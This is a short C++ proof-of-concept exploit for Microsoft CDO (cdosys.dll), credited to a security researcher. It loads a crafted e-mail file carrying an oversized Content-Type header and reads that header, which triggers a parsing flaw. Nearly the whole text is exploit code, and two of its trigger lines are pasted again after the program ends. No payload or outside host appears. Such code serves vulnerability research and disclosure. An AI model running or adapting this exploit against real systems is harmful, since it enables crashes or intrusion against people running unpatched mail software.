//
// Microsoft CDO Proof of Concept Exploit by Gary O'leary-Steele <garyo at sec-1.com>
// 
// Step 1. 
// 
// Create an E-mail named vuln.eml including a large "Content-Type:" header. 
// 
// Step 2. 
//
// Compile with -GX option 
//

#import <msado15.dll> no_namespace rename("EOF", "adoEOF") 
#import <cdosys.dll> rename_namespace("CDO") 

#include <stdio.h> 

int main() 
{ 

CoInitialize(0); 
try 
{ 
CDO::IMessagePtr spMsg(__uuidof(CDO::Message)); 
_StreamPtr spStream(spMsg->GetStream()); 
spStream->Position = 0; 
spStream->Type = adTypeBinary; 
spStream->LoadFromFile("vuln.eml"); 
spStream->Flush(); 

for(long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++) 
{ 
CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i]; 
_variant_t v = 
spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value; 
} 

} 
catch(_com_error &e) 
{ 
printf("COM error[0x%X, %s]\n", e.Error(), 
(LPCTSTR)e.Description()); 
} 
catch(...) 
{ 
printf("General exception\n"); 
} 

CoUninitialize(); 

return 0; 
} 

CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i]; 
_variant_t v = spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;